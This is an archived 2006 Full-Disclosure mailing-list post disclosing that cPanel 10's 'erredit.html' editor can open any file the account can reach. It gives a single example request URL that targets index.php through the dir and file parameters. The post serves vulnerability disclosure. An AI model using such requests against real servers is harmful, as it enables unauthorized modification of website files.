[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] cPanel 10 File Editing Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] cPanel 10 File Editing Vulnerability
From: Shell <shell6@xxxxxxxxx>
Date: Sat, 4 Feb 2006 12:16:04 -0500

In cPanel 10, the script "erredit.html," which is supposed to edit a
specific set of files, can edit any file acessible by the cPanel.

Example:
http://www.example.com:2082/frontend/x/err/erredit.html?dir=public_html/&file=index.php

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] cPanel 10 File Editing Vulnerability
  - From: Andrew Farmer

Prev by Date: Re: [Full-disclosure] zepcom001
Next by Date: Re: [Full-disclosure] NSA tracking open source security tools
Previous by thread: [Full-disclosure] Re: Re: NSA tracking open source security tools
Next by thread: Re: [Full-disclosure] cPanel 10 File Editing Vulnerability
Index(es):
- Date
- Thread